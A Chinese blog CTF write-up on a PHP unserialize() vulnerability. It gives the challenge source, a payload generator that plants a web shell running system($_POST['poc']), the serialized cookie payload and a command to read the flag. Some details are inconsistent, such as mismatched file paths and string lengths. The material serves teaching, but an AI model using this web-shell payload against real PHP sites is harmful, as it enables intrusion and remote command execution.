CTF web题总结--unserizable

最新推荐文章于 2024-07-19 13:51:47 发布
最新推荐文章于 2024-07-19 13:51:47 发布
阅读量1.2k 收藏 1
点赞数
文章标签: php 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20817327/article/details/77688698
版权

php的反序列化漏洞
代码:

<?php
class Person {
    private static $defaults = [
        'name'     => null,
        'gender'   => null,
        'address'  => null,
        'birth'    => null,
        'married'  => null,
        'flag'     => false,
    ];
    private $data;

    public function __construct(array $data = []) {
        $this->data = array_replace(self::$defaults, $data);
        // Easy for you :)
        if (strlen($this->getName() . $this->getGender() . $this->getAddress()) !== 24) {
            $this->setFlag(false);
            return;
        }
        if (!preg_match('/^[\w]{4}_you_$/', $this->getName()) ||
            substr($this->getName(), 0, 4) !== 'Wish') {
            $this->setFlag(false);
            return;
        }
        if ($this->getGender() !== chr(65)) {
            $this->setFlag(false);
            return;
        }
        $this->setAddress('_happy_holiday'); // uhu?
        if (!$this->getBirth()) {
            $this->setFlag(false);
            return;
        } elseif ($this->getBirth() && !is_numeric($this->getBirth())) {
            $this->setBirth($this->getBirth());
        }
        if ($this->getBirth() < 1485532800) {  // New Year
            $this->setFlag(false);
            return;
        }
    }

    public function toArray() {
        return $this->data;
    }

    public function getName() {
        return $this->data['name'];
    }

    public function setName($name) {
        $this->data['name'] = $name;
    }

    public function getGender() {
        return $this->data['gender'];
    }

    public function setGender($gender) {
        $this->data['gender'] = $gender;
    }

    public function getAddress() {
        return $this->data['address'];
    }

    public function setAddress($address) {
        $this->data['address'] = $address;
    }

    public function getBirth() {
        return $this->data['birth'];
    }

    public function setBirth($timestamp) {
        $this->data['birth'] = is_numeric($timestamp)
            ? (int) $timestamp
            : strtotime($timestamp);
    }

    public function getMarried() {
        return $this->data['married'];
    }

    public function setMarried($married) {
        $this->data['married'] = $married;
    }

    public function getFlag() {
        return $this->data['flag'];
    }

    public function setFlag($flag) {
        $this->data['flag'] = $flag;
    }
}

class Storing {
    private $filename;
    private $persons = [];

    public function setPerson(Person $person) {
        $this->persons[] = $person;
    }

    public function __construct($personFile) {
        $this->filename = $personFile;
    }

    public function __destruct() {
        $this->save($this->filename);
    }

    public function save($filename) {
        $json = [];
        foreach ($this->persons as $person)
            if ($person->getFlag())
                $json[] = $person->toArray();
        file_put_contents($filename, json_encode($json));
    }
}

if (isset($_COOKIE['newyear'])) {
    $data = unserialize($_COOKIE['newyear']);
} else {
?>
<!DOCTYPE HTML>
<html>
<head>
 <meta charset="utf-8">
    <title>Ohhhhhhh!</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <style type="text/css">
        .center {
           position: absolute;
           left: 50%;
           margin-right: -50%;
           transform: translate(-50%, -0%)
        }
        .below {
          position: absolute;
          left: 50%;
          top: 50%;
          transform: translate(-50%, -50%);
        }
    </style>
    <link rel="stylesheet" type="text/css" href="/assets/css/flipclock.css">
</head>
<body style="background-image: url(/assets/img/9.jpg);background-size:cover;">
  <div class="center below">
            <div id="clock"></div>
  </div>
</body>
<script type="text/javascript" src="/assets/js/jquery-3.1.1.min.js"></script>
<script type="text/javascript" src="/assets/js/flipclock.min.js"></script>
<script type="text/javascript">
var end  = new Date(Date.UTC(2017, 0, 27, 16, 0, 0));
var now  = new Date();
var diff  = end.getTime() - now.getTime();
var clock = $('#clock').FlipClock(diff/1000, {
    clockFace: 'DailyCounter',
    countdown: true
});
</script>
</html>
<?php } ?>

上述代码中,用户控制的值可能会被传递到php的反序列化函数,在用户提供的输入未进行适当处理就传递给函数unserialize()时,此时就有可能导致该漏洞的发送。
为了成功地利用上述漏洞,必须满足三个条件:
1、应用程序中必须含有一个实现某个PHP魔幻方法(例如__wakeup或者__destruct)的类,可以用这个类进行恶意攻击,或者开始一个“POP链”。
2、当调用脆弱的unserialize()时,必须声明攻击期间所使用的所有类,否则必须为这些类支持对象自动加载。
3、传递给反序列化操作的数据必须来自于一个文件,所以服务器上必须包含有一个包含序列化数据的文件。
题解:
根据给出的类构造payload生成脚本

$obj = new Storing('/var/www/shell.php');
$payload = '<?php echo system($_POST[\'poc\']); ?>';
$obj->setPerson(new Person([
'name'=> 'Wish_you_',
'gender'=> 'A',
'address' => '_happy_holiday',
'birth'=> 1485532801,
'married' => $payload,
'flag' => true])
);
file_put_contents('./built_payload_poc', serialize($obj));

打开built_payload_poc就可以发现payload

O:7:"Storing":2:{s:17:"^@Storing^@filename";s:18:"/var/www/html/1-web02/shell.php";s:16:"^@Storing^@persons";a:1:{i:0;O:6:"Person":1:{s:12:"^@Person^@data";a:6:{s:4:"name";s:9:"Wish_you_";s:6:"gender";s:1:"A";s:7:"address";s:14:"_happy_holiday";s:5:"birth";i:1485532801;s:7:"married";s:36:"<?php echo system($_POST['poc']); ?>";s:4:"flag";b:1;}}}}

将payload编码后放入cookies中,然后就可以向目标写入shell.php
然后通过一句话木马拿到flag.txt中的flag

poc=cat%20/flag.php
bob62856
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
南邮CTF练习——web
dcison的博客
11-11 4万+
南邮CTF部分
005-CTF web总结-第五课 CTF WEB实战练习(一).pdf
07-09
本篇将对"005-CTF web总结-第五课 CTF WEB实战练习(一)"中的部分目进行详细解析。 1. **Web2**:这是一道基础的Web安全目,可能涉及到SQL注入或文件包含漏洞。参赛者需要理解HTTP请求构造,以及如何通过...
CTF_WEB(习)
若比邻的博客
12-15 5144
一、bugku_web_cookie欺骗:https://ctf.bugku.com/challenges/detail/id/87.html 地址栏filename一看为base64,解密为keys.php 尝试index.php加密为base64:aW5kZXgucGhw,读取一下,啥也没有 观察地址栏,将line赋值为1试试,发现是将index.php按行读取了 将index.php读取出来,读读取结果 #cookies欺骗 import requests php=""
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-19 787
CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的"世界杯"。
CTF-web_php_serialize反序列化
Be Smart
02-24 889
一.根据目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
CTF web基础
m0_51426816的博客
01-10 527
BugkuCTF web2 要求输入验证码为两位数,但是长度限制为1位 直接更改长度限制,然后输入答案得到flag 攻防世界 web 新手练习区 get-post 在地址栏中直接添加/?a=1 在火狐浏览器中使用Hackbar(我用的是Max Hackbar),F12进入 提交得到flag ...
CTF-Web基础
weixin_52182264的博客
04-21 6549
CTF-Web基础
006-CTF web总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一:成绩单** 这个目可能...
007-CTF web总结-第七课 CTF WEB实战练习(三).pdf
07-09
007-CTF Web总结的第七课主要涵盖了三个部分:入门第一部分、入门第二部分-社工篇和入门第三部分-高级篇。这些部分详细介绍了在CTF(Capture The Flag)网络安全竞赛中常见的Web挑战类型,并通过Bugku平台上的...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-all-in-one
01-30
ctf-all-in-one
CTF web安全经典例讲解
10-22
该内容为CTFweb安全经理例讲解,包含sql注入,密码学、文件上传,提权、抓包改包等多种型讲解,图文结合,适合新手学习。
CTF日记之web目(入门目)
sunleibaba的博客
01-22 199
CTF日记:百度杯”CTF比赛 九月场 Upload 打开目,发现是一道上传: 我们上传了一句话木马的php文件,发现了上传的路径 然后查看2.php文件,发现开头的“<?php”被过滤了。 那我们就换个一句话木马。 <script language="pHp">@eval($_POST['123'])</script>,这样 ?和php就都被绕过了,再次上传试试看。 用中国蚁剑连接试试看,发现成功了! 找到flag.php,打开就得到了flag。 ...
记一次院赛CTFWEB(入门级别)
热门推荐
CTF小白的博客
04-14 2万+
目录签到一签到二口算小天才easy php录取查询我爱pythonSpring 这次院赛的目比较基础,适合给刚入门CTF的小白提供一个大致CTF思路。(主要因为本人小白,表示能学到不少东西。) 签到一 目中直接给了flag,提交就可以了。 签到二 这主要考察的是基本的F12能力,查看网页源码,以及修改input输入框的长度。 口算小天才 这通过意,是需要让我们在1~3秒内回答...
CTF_Web:反序列化学习笔记(二)CTF经典考由浅至深
AFCC_的博客(Web_Dog)
08-16 6520
0x00 CTF中的反序列化目 这类目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
CTF wed安全(攻防世界)练习_ctfweb
Innocence_0的博客
05-24 458
进入网站如图:翻译:在这个小小的挑战训练中,你将学习Robots exclusionstandard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构,而不是保护内容不被抓取。好好享受吧!**步骤一:**进入robots.txt文件,如图:**步骤二:**得到/f10g.php,在进入这里面得到flag提交即可成功!!!
CTFWeb方向练习)(持续更新)
m0_56010012的博客
02-23 5167
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
有了这个网络安全面试,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 841
还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
[ctfshow-web]反序列化
nareku的博客
07-25 273
PHP中的魔术变量__sleep()//执行serialize()时,先会调用这个函数__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct()//当对象被创建时,会触发进行初始化__destruct()//对象被销毁时触发//当一个对象被当作字符串使用时触发__call()//在对象上下文中调用不可访问的方法时触发__callStatic()//在静态上下文中调用不可访问的方法时触发。......
CTF Web理论基础篇-第二课:工具集与php弱类型
综上所述,本文总结了《002-CTF web理论基础篇-第二课理论基础.pdf》和《002-CTF web理论基础篇-第二课理论基础》中的内容,包括CTF网页型的工具集和理论基础。同时,我们也了解了php的弱类型特性和类型转换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值